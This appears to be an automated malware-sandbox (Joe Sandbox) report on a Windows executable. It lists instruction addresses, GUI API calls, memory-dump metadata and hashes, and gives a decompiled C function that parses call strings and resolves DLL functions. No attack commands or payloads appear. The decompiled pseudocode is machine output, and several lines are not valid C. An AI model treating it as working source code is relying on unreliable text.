                                                        0x00404faf
                                                        0x00404faf
                                                        0x00404fb6
                                                        0x00405027
                                                        0x0040502f
                                                        0x00405037
                                                        0x00405037
                                                        0x00405040
                                                        0x00405042
                                                        0x00405049
                                                        0x0040504c
                                                        0x0040504c
                                                        0x00405052
                                                        0x00405059
                                                        0x0040505c
                                                        0x0040505c
                                                        0x00405062
                                                        0x00405068
                                                        0x0040506e
                                                        0x0040506e
                                                        0x0040507b
                                                        0x004051d1
                                                        0x004051d8
                                                        0x004051f5
                                                        0x004051fb
                                                        0x0040520d
                                                        0x0040520d
                                                        0x00000000
                                                        0x00405081
                                                        0x00405083
                                                        0x00405088
                                                        0x0040508d
                                                        0x00405092
                                                        0x00405094
                                                        0x00405094
                                                        0x00405095
                                                        0x00405096
                                                        0x00405098
                                                        0x00405098
                                                        0x004050a0
                                                        0x004050e1
                                                        0x004050e3
                                                        0x004050f3
                                                        0x004050f6
                                                        0x004050fb
                                                        0x00405102
                                                        0x00405105
                                                        0x004051a7
                                                        0x004051ad
                                                        0x004051bb
                                                        0x004051cc
                                                        0x004051cc
                                                        0x00000000
                                                        0x004051bb
                                                        0x0040510b
                                                        0x0040510e
                                                        0x00405114
                                                        0x00405119
                                                        0x0040511b
                                                        0x0040511d
                                                        0x00405123
                                                        0x0040512a
                                                        0x0040512f
                                                        0x00405136
                                                        0x00405139
                                                        0x00405139
                                                        0x00405140
                                                        0x0040514c
                                                        0x00405150
                                                        0x00405152
                                                        0x00405152
                                                        0x00405142
                                                        0x00405144
                                                        0x00405144
                                                        0x00405172
                                                        0x0040517e
                                                        0x0040518d
                                                        0x0040518d
                                                        0x0040518f
                                                        0x00405192
                                                        0x0040519b
                                                        0x00000000
                                                        0x004050a2
                                                        0x004050ad
                                                        0x004050b0
                                                        0x004050b5
                                                        0x004050b7
                                                        0x004050bb
                                                        0x004050cb
                                                        0x004050d5
                                                        0x004050d7
                                                        0x004050da
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004050bd
                                                        0x004050bd
                                                        0x004050c3
                                                        0x004050c5
                                                        0x004050c5
                                                        0x004050c6
                                                        0x004050c7
                                                        0x00000000
                                                        0x004050bd
                                                        0x004050a0
                                                        0x0040507b
                                                        0x00404fbe
                                                        0x00000000
                                                        0x00404fd4
                                                        0x00404fde
                                                        0x00404fe3
                                                        0x00000000
                                                        0x00000000
                                                        0x00404ff5
                                                        0x00404ffa
                                                        0x00405006
                                                        0x00405006
                                                        0x00405008
                                                        0x00405017
                                                        0x00405019
                                                        0x0040501d
                                                        0x00405020
                                                        0x00000000
                                                        0x00405020
                                                        0x00404fbe
                                                        0x00404c7e
                                                        0x00404c83
                                                        0x00404c8c
                                                        0x00404c93
                                                        0x00404ca1
                                                        0x00404cac
                                                        0x00404cb2
                                                        0x00404cc0
                                                        0x00404cd4
                                                        0x00404cd9
                                                        0x00404ce6
                                                        0x00404ceb
                                                        0x00404d01
                                                        0x00404d12
                                                        0x00404d1f
                                                        0x00404d1f
                                                        0x00404d22
                                                        0x00404d28
                                                        0x00404d2a
                                                        0x00404d2d
                                                        0x00404d32
                                                        0x00404d37
                                                        0x00404d39
                                                        0x00404d39
                                                        0x00404d59
                                                        0x00404d59
                                                        0x00404d5b
                                                        0x00404d5c
                                                        0x00404d61
                                                        0x00404d64
                                                        0x00404d67
                                                        0x00404d6b
                                                        0x00404d70
                                                        0x00404d75
                                                        0x00404d79
                                                        0x00404d7e
                                                        0x00404d83
                                                        0x00404d85
                                                        0x00404d8d
                                                        0x00404e58
                                                        0x00404e6b
                                                        0x00000000
                                                        0x00404d93
                                                        0x00404d96
                                                        0x00404d99
                                                        0x00404d9c
                                                        0x00404d9c
                                                        0x00404da3
                                                        0x00404da9
                                                        0x00404dac
                                                        0x00404db2
                                                        0x00404db3
                                                        0x00404db8
                                                        0x00404dc1
                                                        0x00404dc8
                                                        0x00404dcb
                                                        0x00404dce
                                                        0x00404dd1
                                                        0x00404e0d
                                                        0x00404e36
                                                        0x00404e0f
                                                        0x00404e1c
                                                        0x00404e1c
                                                        0x00404dd3
                                                        0x00404dd6
                                                        0x00404de5
                                                        0x00404def
                                                        0x00404df7
                                                        0x00404dfe
                                                        0x00404e06
                                                        0x00404e06
                                                        0x00404dd1
                                                        0x00404e3c
                                                        0x00404e3d
                                                        0x00404e49
                                                        0x00404e49
                                                        0x00404e56
                                                        0x00404e71
                                                        0x00404e75
                                                        0x00404e92
                                                        0x00404e97
                                                        0x00000000
                                                        0x00404e77
                                                        0x00404e7c
                                                        0x00404e85
                                                        0x0040520f
                                                        0x00405221
                                                        0x00405221
                                                        0x00404e75
                                                        0x00000000
                                                        0x00404e56
                                                        0x00404d8d

                                                        APIs
                                                        • GetDlgItem.USER32 ref: 00404C44
                                                        • GetDlgItem.USER32 ref: 00404C4F
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                                        • LoadBitmapW.USER32(0000006E), ref: 00404CAC
                                                        • SetWindowLongW.USER32 ref: 00404CC5
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                                        • DeleteObject.GDI32(00000000), ref: 00404D22
                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                                        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                                        • SetWindowLongW.USER32 ref: 00404E6B
                                                        • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                                        • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                                        • GlobalFree.KERNEL32 ref: 0040505C
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                                        • ShowWindow.USER32(?,00000000), ref: 004051FB
                                                        • GetDlgItem.USER32 ref: 00405206
                                                        • ShowWindow.USER32(00000000), ref: 0040520D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 1638840714-813528018
                                                        • Opcode ID: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
                                                        • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                                        • Opcode Fuzzy Hash: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
                                                        • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 10001B18 Relevance: 25.0, APIs: 13, Strings: 1, Instructions: 544stringmemoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 95%
                                                        			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t319 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if(_t319 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t284) {
							_t248 = _t248 - 1;
						}
						 *(_t319 + 0x1014) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L40:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L61:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L62:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L63;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L131:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L134:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L141:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L62;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L61;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L134;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L141;
								}
								goto L131;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L74:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											L115:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L120:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L91;
											}
											L116:
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L74;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L141;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L56;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(4);
								goto L56;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L161:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L150:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L157:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L145:
										 *(_t319 + 0x100c) = _t220;
										goto L161;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L161;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L161;
									}
									goto L157;
								}
							}
							_t225 = LoadLibraryW(_t312);
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L159;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L161;
						}
						_t220 = E10001311(_t229);
						L144:
						goto L145;
					}
					if(_t228 != 1) {
						goto L161;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L160;
					}
					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L144;
				}
			}































































                                                        0x10001b20
                                                        0x10001b23
                                                        0x10001b26
                                                        0x10001b29
                                                        0x10001b2c
                                                        0x10001b2f
                                                        0x10001b32
                                                        0x10001b34
                                                        0x10001b37
                                                        0x10001b3c
                                                        0x10001b3f
                                                        0x10001b47
                                                        0x10001b4f
                                                        0x10001b51
                                                        0x10001b54
                                                        0x10001b5c
                                                        0x10001b5c
                                                        0x10001b61
                                                        0x10001b64
                                                        0x00000000
                                                        0x00000000
                                                        0x10001b6e
                                                        0x10001b71
                                                        0x10001b76
                                                        0x10001b78
                                                        0x10001beb
                                                        0x10001beb
                                                        0x10001beb
                                                        0x10001bef
                                                        0x10001bf2
                                                        0x10001bf4
                                                        0x10001c16
                                                        0x10001c18
                                                        0x10001c1b
                                                        0x10001c2a
                                                        0x10001c2c
                                                        0x10001c32
                                                        0x10001c32
                                                        0x10001c38
                                                        0x10001c3b
                                                        0x10001c3b
                                                        0x10001c3e
                                                        0x10001c3e
                                                        0x10001c44
                                                        0x10001c46
                                                        0x10001c46
                                                        0x10001c48
                                                        0x10001c4b
                                                        0x10001c4e
                                                        0x10001c54
                                                        0x10001c5a
                                                        0x10001c5d
                                                        0x10001c81
                                                        0x10001c84
                                                        0x00000000
                                                        0x00000000
                                                        0x10001c87
                                                        0x10001c89
                                                        0x10001c97
                                                        0x10001c9a
                                                        0x10001c9c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001c9e
                                                        0x10001c9e
                                                        0x10001c9e
                                                        0x10001ca4
                                                        0x10001ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x10001ca8
                                                        0x10001caa
                                                        0x10001cac
                                                        0x10001cae
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001cae
                                                        0x10001cb0
                                                        0x10001cb2
                                                        0x10001cb4
                                                        0x10001cb4
                                                        0x10001cba
                                                        0x10001cc0
                                                        0x10001cc2
                                                        0x10001cd6
                                                        0x10001cd6
                                                        0x10001cd8
                                                        0x10001cc4
                                                        0x10001cca
                                                        0x10001ccd
                                                        0x10001ccd
                                                        0x00000000
                                                        0x10001c5f
                                                        0x10001c5f
                                                        0x10001c5f
                                                        0x10001c60
                                                        0x10001c68
                                                        0x10001c6c
                                                        0x10001c72
                                                        0x10001c76
                                                        0x10001cde
                                                        0x10001ce1
                                                        0x10001ce5
                                                        0x10001d70
                                                        0x10001d74
                                                        0x10001b59
                                                        0x00000000
                                                        0x10001b59
                                                        0x00000000
                                                        0x10001d74
                                                        0x10001c62
                                                        0x10001c62
                                                        0x10001c63
                                                        0x00000000
                                                        0x00000000
                                                        0x10001c65
                                                        0x10001c66
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001c66
                                                        0x10001c5d
                                                        0x10001bf7
                                                        0x00000000
                                                        0x00000000
                                                        0x10001c00
                                                        0x10001c03
                                                        0x10001c10
                                                        0x10001c10
                                                        0x10001c05
                                                        0x00000000
                                                        0x10001c05
                                                        0x10001b7a
                                                        0x10001b7d
                                                        0x10001bce
                                                        0x10001bd1
                                                        0x10001be3
                                                        0x10001be3
                                                        0x10001be6
                                                        0x00000000
                                                        0x10001be6
                                                        0x10001bd3
                                                        0x10001bd8
                                                        0x00000000
                                                        0x00000000
                                                        0x10001bda
                                                        0x10001bdd
                                                        0x10001ced
                                                        0x10001cf0
                                                        0x10001cf0
                                                        0x10001cf2
                                                        0x10002048
                                                        0x1000204b
                                                        0x100020b2
                                                        0x10001d60
                                                        0x10001d63
                                                        0x10001d66
                                                        0x10001d69
                                                        0x10001d69
                                                        0x10001d6b
                                                        0x10001d6c
                                                        0x10001d6c
